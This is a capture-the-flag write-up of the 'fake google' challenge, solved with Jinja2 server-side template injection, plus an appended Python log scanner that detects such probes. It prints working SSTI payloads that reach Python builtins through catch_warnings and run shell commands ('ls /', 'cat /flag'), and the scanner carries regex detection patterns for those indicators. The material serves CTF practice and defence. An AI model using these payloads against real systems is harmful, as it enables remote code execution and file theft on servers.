[BJDCTF 2nd]fake google
Open the page:
After trying a few inputs, I found that entering xxx is displayed in the following format:
P3's girlfirend is : xxxxx
Then I guessed that it might execute code, and found that it does:
<script>alert(1);</script>
The page that outputs "P3's girlfirend is : xxxxx" has a line in its HTML comments; the author has told us the point outright: SSTI injection
<!--ssssssti & a little trick -->
The solution is obvious then: the author went easy on us, so there is hardly any filtering.
Payload: list the root directory; the output shows that flag is in the root directory
?name=
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}{% endif %}{% endfor %}
The code got hidden (the rendering ate the underscores); here it is in full:
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__=='catch_warnings' %}
{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}
{% endif %}{% endfor %}
P3's girlfirend is : app bd_build bin boot dev etc flag home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
Payload: read flag and get the flag
?name=
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()")}}{% endif %}{% endfor %}
The code got hidden (the rendering ate the underscores); here it is in full:
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__=='catch_warnings' %}
{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()")}}
{% endif %}{% endfor %}
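As an added, defender-side example that is not part of the writeup: the payloads above reach the server percent-encoded in the query string, so a log scan has to decode them (including double encoding) before matching. This stdlib-only Python scanner flags the indicators used in this challenge (template delimiters, the `__class__.__base__.__subclasses__()` walk, `__globals__`/`__builtins__`, os/popen) in constructed access-log lines; the indicator names, log format and IP addresses are assumptions.

```python
import re
from urllib.parse import parse_qsl, quote, unquote

# Indicators of the Jinja2 SSTI probing used in this challenge: delimiters, the
# subclass walk, the jump to __globals__/__builtins__, and the os/popen call.
SSTI_PATTERNS = [
    ("template_delimiter", re.compile(r"\{\{|\{%")),
    ("subclass_walk", re.compile(r"__class__\s*\.\s*__base__|__subclasses__\s*\(")),
    ("globals_builtins", re.compile(r"__globals__|__builtins__")),
    ("os_exec", re.compile(r"__import__\s*\(\s*['\"]os['\"]|\bpopen\s*\(")),
]
# Common/combined access-log line (assumed format); only the request target is used.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+)[^"]*" \d{3}')

def fully_decode(value):
    # Undo repeated percent-encoding so a double-encoded probe is still seen.
    while (decoded := unquote(value)) != value:
        value = decoded
    return value

def classify(target):
    # Sorted indicator names found in any query value of the request target.
    _, _, query = target.partition("?")
    hits = set()
    for _, raw in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(raw)
        hits.update(name for name, rx in SSTI_PATTERNS if rx.search(value))
    return sorted(hits)

def scan_log(lines):
    # (ip, target, indicators) for every request that carries SSTI indicators.
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        hits = classify(m.group("target")) if m else []
        if hits:
            findings.append((m.group("ip"), m.group("target"), hits))
    return findings

# Constructed sample traffic: benign requests plus the writeup's directory-listing
# payload, percent-encoded the way a browser sends it in the query string.
LS_PAYLOAD = (
    "{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}"
    "{{ c.__init__.__globals__['__builtins__'].eval(\"__import__('os').popen('ls /').read()\")}}"
    "{% endif %}{% endfor %}")
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Mar/2020:10:21:40 +0800] "GET /?name=alice HTTP/1.1" 200 64',
    '10.0.0.7 - - [14/Mar/2020:10:21:58 +0800] "GET /?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 66',
    f'10.0.0.7 - - [14/Mar/2020:10:22:01 +0800] "GET /?name={quote(LS_PAYLOAD, safe="")} HTTP/1.1" 200 512',
]
```

The `{{7*7}}` probe is the usual first sign of SSTI testing, so alerting on the delimiter indicator alone is worthwhile even before a full payload shows up.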